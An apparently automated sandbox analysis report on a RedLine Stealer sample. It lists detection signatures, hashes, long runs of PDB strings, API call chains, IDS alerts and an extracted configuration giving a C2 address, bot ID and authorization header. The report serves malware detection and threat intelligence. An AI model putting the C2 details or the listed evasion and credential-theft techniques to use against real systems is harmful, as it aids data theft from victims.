Windows Analysis Report
SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe

Overview

General Information

Sample name: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe
Analysis ID: 1537710
MD5: d0cce7870080bd889dba1f4cfd2b3b26
SHA1: a973389aa0908d7b56115aff9cd4878fbd9381f9
SHA256: 8ff3039072ecb32c50f446d6857aceef55547486f0572fe70feb5b1fa4c4727a
Tags: exeRedLineStealer
Infos:

Detection

MicroClip, RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected MicroClip
Yara detected RedLine Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Changes the view of files in windows explorer (hidden files and folders)
Contain functionality to detect virtual machines
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Found API chain indicative of debugger detection
Found hidden mapped module (file has been removed from disk)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the hosts file
Modifies the prolog of user mode functions (user mode inline hooks)
Overwrites Mozilla Firefox settings
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Uncommon Svchost Parent Process
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
RedLine Stealer RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

AV Detection
barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Avira: detection malicious, Label: TR/AD.RedLineSteal.yterx
Found malware configuration
Source: 6.0.5BB2.tmp.x.exe.5d0000.0.unpack Malware Configuration Extractor: RedLine {"C2 url": ["176.111.174.140:1912"], "Bot Id": "Diamotrix", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe ReversingLabs: Detection: 63%
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe ReversingLabs: Detection: 63%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.5% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Joe Sandbox ML: detected
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312055704.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312690465.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.10.dr
Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: 7DF0.tmp.zx.exe, 0000000A.00000003.2304926255.0000024317210000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.10.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307390313.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.10.dr
Source: Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2305426346.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdb source: 7DF0.tmp.zx.exe, 0000000C.00000002.2339757329.00007FF8B83B1000.00000002.00000001.01000000.0000000C.sdmp, ucrtbase.dll.10.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309132497.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2306770912.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2304137052.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310481991.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2311357401.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309132497.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312870947.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2311585051.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.10.dr
Source: Binary string: C:\A\21\b\bin\amd64\_ctypes.pdb source: 7DF0.tmp.zx.exe, 0000000C.00000002.2340109854.00007FF8BFB81000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307880735.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310816524.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310155822.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307880735.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2300771207.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2311214975.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312267619.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307762133.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307008995.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309513493.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: vcruntime140.amd64.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2300489824.000002431720F000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000C.00000002.2340265545.00007FF8BFB9E000.00000002.00000001.01000000.0000000E.sdmp, VCRUNTIME140.dll.10.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2311357401.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309513493.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2305736309.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2313183679.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307202317.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310650811.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309384633.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310329484.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.10.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312518356.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2311078798.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310816524.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2306288595.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .PdB] source: 7DF0.tmp.zx.exe.3.dr
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307008995.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.10.dr
Source: Binary string: C:\A\21\b\bin\amd64\select.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2321669980.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309750638.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdbUGP source: 7DF0.tmp.zx.exe, 0000000C.00000002.2339757329.00007FF8B83B1000.00000002.00000001.01000000.0000000C.sdmp, ucrtbase.dll.10.dr
Source: Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307202317.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2311078798.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: vcruntime140.amd64.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2300489824.000002431720F000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000C.00000002.2340265545.00007FF8BFB9E000.00000002.00000001.01000000.0000000E.sdmp, VCRUNTIME140.dll.10.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312870947.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2311214975.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2313183679.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307762133.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310481991.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310329484.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.10.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307390313.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.10.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309384633.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309750638.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2306288595.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1d 10 Sep 2019built on: Mon Sep 16 11:00:37 2019 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: libcrypto-1_1.dll.10.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310950788.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.10.dr
Source: Binary string: C:\A\21\b\bin\amd64\python38.pdb source: 7DF0.tmp.zx.exe, 0000000C.00000002.2338790461.00007FF8A8DFD000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2308985706.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.10.dr
Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2304926255.0000024317210000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.10.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312267619.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2308013050.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310013332.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2313036528.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309639448.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.10.dr
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2306770912.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312055704.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2308142882.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2308985706.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.10.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309257952.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2313338907.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309879949.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310650811.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\6\b\libcrypto-1_1.pdb source: libcrypto-1_1.dll.10.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310013332.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2305736309.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307569047.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312518356.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2313338907.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2308142882.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309257952.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310155822.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2308013050.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: libcrypto-1_1.dll.10.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312690465.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309639448.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.10.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309879949.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.10.dr
Source: Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2322802000.0000024317219000.00000004.00000020.00020000.00000000.sdmp, unicodedata.pyd.10.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2311585051.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2313036528.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310950788.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.10.dr
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF9466F0 SHGetFolderPathW,FindFirstFileW,FindNextFileW, 0_2_00007FF6CF9466F0
Source: C:\Windows\explorer.exe Code function: 3_2_11056AE0 lstrcpy,lstrcatA,CreateDirectoryA,GetLastError,FindFirstFileA,lstrcpy,lstrcatA,lstrcatA,lstrcpy,lstrcatA,lstrcatA,lstrcmp,lstrcmp,CreateDirectoryA,GetLastError,CopyFileA,FindNextFileA, 3_2_11056AE0
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCA66F0 SHGetFolderPathW,FindFirstFileW,FindNextFileW, 4_2_00007FF6BCCA66F0
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00007FF78FA666F0 SHGetFolderPathW,FindFirstFileW,FindNextFileW, 5_2_00007FF78FA666F0
Source: C:\Windows\System32\svchost.exe Code function: 9_2_00007FF7A34B66F0 SHGetFolderPathW,FindFirstFileW,FindNextFileW, 9_2_00007FF7A34B66F0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779E979B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 10_2_00007FF779E979B0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779E985A0 FindFirstFileExW,FindClose, 10_2_00007FF779E985A0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779EB0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 10_2_00007FF779EB0B84
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779E985A0 FindFirstFileExW,FindClose, 12_2_00007FF779E985A0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779E979B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 12_2_00007FF779E979B0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779EB0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 12_2_00007FF779EB0B84
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B8342DFC FindFirstFileExW, 12_2_00007FF8B8342DFC
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B836EFEC FindFirstFileExW,FindClose,FindNextFileW, 12_2_00007FF8B836EFEC
Source: C:\Windows\System32\svchost.exe Code function: 13_2_00007FF67F5566F0 SHGetFolderPathW,FindFirstFileW,FindNextFileW, 13_2_00007FF67F5566F0

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.5:49709 -> 176.111.174.140:80
Source: Network traffic Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.5:49786 -> 176.111.174.140:1912
